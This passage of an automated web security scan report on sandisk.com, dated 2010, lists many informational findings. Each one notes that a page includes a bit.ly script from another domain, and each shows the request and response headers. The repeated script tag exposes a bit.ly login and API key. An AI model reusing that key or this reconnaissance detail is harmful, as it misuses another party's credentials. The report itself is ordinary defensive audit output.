<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.98. http://www.sandisk.com/business-solutions/mobile-handset-vendors/microsdhc.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/mobile-handset-vendors/microsdhc.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/mobile-handset-vendors/microsdhc.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/flash-memory-cards
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37647
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.99. http://www.sandisk.com/business-solutions/mobile-network-operators previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/mobile-network-operators

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/mobile-network-operators HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40121
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.100. http://www.sandisk.com/business-solutions/mobile-network-operators.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/mobile-network-operators.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/mobile-network-operators.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40126
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.101. http://www.sandisk.com/business-solutions/mobile-network-operators/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/mobile-network-operators/

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/mobile-network-operators/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40122
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.102. http://www.sandisk.com/business-solutions/mobile-network-operators/memory-cards- previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/mobile-network-operators/memory-cards-

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/mobile-network-operators/memory-cards- HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-network-operators
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38689
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.103. http://www.sandisk.com/business-solutions/mobile-network-operators/memory-cards-.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/mobile-network-operators/memory-cards-.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/mobile-network-operators/memory-cards-.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-network-operators
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38694
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.104. http://www.sandisk.com/business-solutions/sd-worm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/sd-worm

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/sd-worm HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41398
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.105. http://www.sandisk.com/business-solutions/sd-worm/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/sd-worm/

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/sd-worm/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41399
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.106. http://www.sandisk.com/business-solutions/sd-worm/benefits previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/sd-worm/benefits

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/sd-worm/benefits HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/sd-worm
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43600
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.107. http://www.sandisk.com/business-solutions/sd-worm/case-studies previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/sd-worm/case-studies

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/sd-worm/case-studies HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/sd-worm
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40650
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.108. http://www.sandisk.com/business-solutions/sd-worm/sd-worm-card previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/sd-worm/sd-worm-card

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/sd-worm/sd-worm-card HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/sd-worm
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 44010
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.109. http://www.sandisk.com/business-solutions/sd-worm/sd-worm-contact-us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/sd-worm/sd-worm-contact-us

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/sd-worm/sd-worm-contact-us HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/sd-worm
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 48323
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.110. http://www.sandisk.com/business-solutions/sd-worm/sd-worm-downloads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/sd-worm/sd-worm-downloads

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/sd-worm/sd-worm-downloads HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/sd-worm
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20267
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.111. http://www.sandisk.com/business-solutions/sd-worm/solutions previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/sd-worm/solutions

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/sd-worm/solutions HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/sd-worm
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39762
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.112. http://www.sandisk.com/business-solutions/ssd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/ssd

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/ssd HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43483
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.113. http://www.sandisk.com/business-solutions/ssd.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/ssd.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/ssd.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43488
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.114. http://www.sandisk.com/business-solutions/ssd/landing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/ssd/landing

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/ssd/landing HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15197
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.115. http://www.sandisk.com/business-solutions/technology previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/technology

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/technology HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17943
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.116. http://www.sandisk.com/business-solutions/usb-flash-drives previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/usb-flash-drives

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/usb-flash-drives HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37009
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.117. http://www.sandisk.com/business-solutions/usb-flash-drives.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/usb-flash-drives.aspx

Issue detail

The response dynamically includes the following script from another domain:

